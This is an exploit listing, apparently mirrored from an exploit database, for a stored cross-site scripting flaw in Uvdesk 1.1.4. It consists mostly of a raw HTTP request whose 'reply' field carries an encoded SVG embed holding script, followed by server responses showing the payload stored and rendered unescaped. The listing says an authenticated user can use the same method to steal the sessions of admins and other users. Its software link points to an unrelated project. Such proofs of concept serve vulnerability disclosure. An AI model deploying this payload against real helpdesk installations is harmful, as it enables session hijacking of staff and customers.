Share
## https://sploitus.com/exploit?id=PACKETSTORM:174308
# Exploit Title: Uvdesk 1.1.4 - Stored XSS (Authenticated)  
# Date: 14/08/2023  
# Exploit Author: Hubert Wojciechowski  
# Contact Author: hub.woj12345@gmail.com  
# Vendor Homepage: https://www.uvdesk.com/  
# Software Link: https://github.com/MegaTKC/AeroCMS  
# Version: 1.1.4  
# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23  
  
# Authenticated user privilages to tickets. User can send XSS to admin or other user and stolen sesssion.  
  
## Example XSS Stored in new ticket  
  
-----------------------------------------------------------------------------------------------------------------------  
Param: reply  
-----------------------------------------------------------------------------------------------------------------------  
Req  
-----------------------------------------------------------------------------------------------------------------------  
  
POST /uvdesk/public/en/member/thread/add/1 HTTP/1.1  
Host: 127.0.0.1  
Content-Length: 812  
Cache-Control: max-age=0  
sec-ch-ua:   
sec-ch-ua-mobile: ?0  
sec-ch-ua-platform: ""  
Upgrade-Insecure-Requests: 1  
Origin: http://127.0.0.1  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXCjJcGbgZxZWLsSk  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.110 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Referer: http://127.0.0.1/uvdesk/public/en/member/ticket/view/1  
Accept-Encoding: gzip, deflate  
Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7  
Cookie: uv-sidebar=0; PHPSESSID=4b0j3r934245lpssq5lil3edm3  
Connection: close  
  
------WebKitFormBoundaryXCjJcGbgZxZWLsSk  
Content-Disposition: form-data; name="threadType"  
  
forward  
------WebKitFormBoundaryXCjJcGbgZxZWLsSk  
Content-Disposition: form-data; name="status"  
  
  
------WebKitFormBoundaryXCjJcGbgZxZWLsSk  
Content-Disposition: form-data; name="subject"  
  
aaaa  
------WebKitFormBoundaryXCjJcGbgZxZWLsSk  
Content-Disposition: form-data; name="to[]"  
  
test@local.host  
------WebKitFormBoundaryXCjJcGbgZxZWLsSk  
Content-Disposition: form-data; name="reply"  
  
%3Cp%3E%3Cembed+src%3D%22data%3Aimage%2Fsvg%2Bxml%3Bbase64%2CPHN2ZyB4bWxuczpzdmc9Imh0dH+A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv+MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs+aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw+IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI%2BYWxlcnQoIlh+TUyIpOzwvc2NyaXB0Pjwvc3ZnPg%3D%3D%22+type%3D%22image%2Fsvg%2Bxml%22+width%3D%22300%22+height%3D%22150%22%3E%3C%2Fembed%3E%3C%2Fp%3E  
------WebKitFormBoundaryXCjJcGbgZxZWLsSk  
Content-Disposition: form-data; name="pic"; filename=""  
Content-Type: application/octet-stream  
  
  
------WebKitFormBoundaryXCjJcGbgZxZWLsSk  
Content-Disposition: form-data; name="nextView"  
  
stay  
------WebKitFormBoundaryXCjJcGbgZxZWLsSk--  
  
  
-----------------------------------------------------------------------------------------------------------------------  
Res:  
-----------------------------------------------------------------------------------------------------------------------  
  
HTTP/1.1 302 Found  
Date: Mon, 14 Aug 2023 11:33:26 GMT  
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29  
X-Powered-By: PHP/7.4.29  
Cache-Control: max-age=0, must-revalidate, private  
Location: /uvdesk/public/en/member/ticket/view/1  
Access-Control-Allow-Origin: *  
Access-Control-Allow-Methods: GET,POST,PUT,OPTIONS  
Access-Control-Allow-Headers: Access-Control-Allow-Origin  
Access-Control-Allow-Headers: Authorization  
Access-Control-Allow-Headers: Content-Type  
X-Debug-Token: bf1b73  
X-Debug-Token-Link: http://127.0.0.1/uvdesk/public/_profiler/bf1b73  
X-Robots-Tag: noindex  
Expires: Mon, 14 Aug 2023 11:33:26 GMT  
Set-Cookie: sf_redirect=%7B%22token%22%3A%22bf1b73%22%2C%22route%22%3A%22helpdesk_member_add_ticket_thread%22%2C%22method%22%3A%22POST%22%2C%22controller%22%3A%7B%22class%22%3A%22Webkul%5C%5CUVDesk%5C%5CCoreFrameworkBundle%5C%5CController%5C%5CThread%22%2C%22method%22%3A%22saveThread%22%2C%22file%22%3A%22C%3A%5C%5Cxampp2%5C%5Chtdocs%5C%5Cuvdesk%5C%5Cvendor%5C%5Cuvdesk%5C%5Ccore-framework%5C%5CController%5C%5CThread.php%22%2C%22line%22%3A44%7D%2C%22status_code%22%3A302%2C%22status_text%22%3A%22Found%22%7D; path=/; httponly; samesite=lax  
Connection: close  
Content-Type: text/html; charset=UTF-8  
Content-Length: 398  
  
<!DOCTYPE html>  
<html>  
<head>  
<meta charset="UTF-8" />  
<meta http-equiv="refresh" content="0;url='/uvdesk/public/en/member/ticket/view/1'" />  
  
<title>Redirecting to /uvdesk/public/en/member/ticket/view/1</title>  
</head>  
<body>  
Redirecting to <a href="/uvdesk/public/en/member/ticket/view/1">/uvdesk/public/en/member/ticket/view/1</a>.  
</body>  
</html>  
-----------------------------------------------------------------------------------------------------------------------  
Redirect and view response:  
-----------------------------------------------------------------------------------------------------------------------  
HTTP/1.1 200 OK  
Date: Mon, 14 Aug 2023 11:44:14 GMT  
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29  
X-Powered-By: PHP/7.4.29  
Cache-Control: max-age=0, must-revalidate, private  
Access-Control-Allow-Origin: *  
Access-Control-Allow-Methods: GET,POST,PUT,OPTIONS  
Access-Control-Allow-Headers: Access-Control-Allow-Origin  
Access-Control-Allow-Headers: Authorization  
Access-Control-Allow-Headers: Content-Type  
X-Debug-Token: 254ce8  
X-Debug-Token-Link: http://127.0.0.1/uvdesk/public/_profiler/254ce8  
X-Robots-Tag: noindex  
Expires: Mon, 14 Aug 2023 11:44:14 GMT  
Connection: close  
Content-Type: text/html; charset=UTF-8  
Content-Length: 300607  
  
<!DOCTYPE html>  
<html>  
<head>  
<title>#1 vvvvvvvvvvvvvvvvvvvvv</title>  
[...]  
<p><embed src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" width="300" height="150"></embed></p>  
[...]  
-----------------------------------------------------------------------------------------------------------------------  
  
XSS execute, we can reply ticket to victim. This payload can use in new articles, tickets, all application.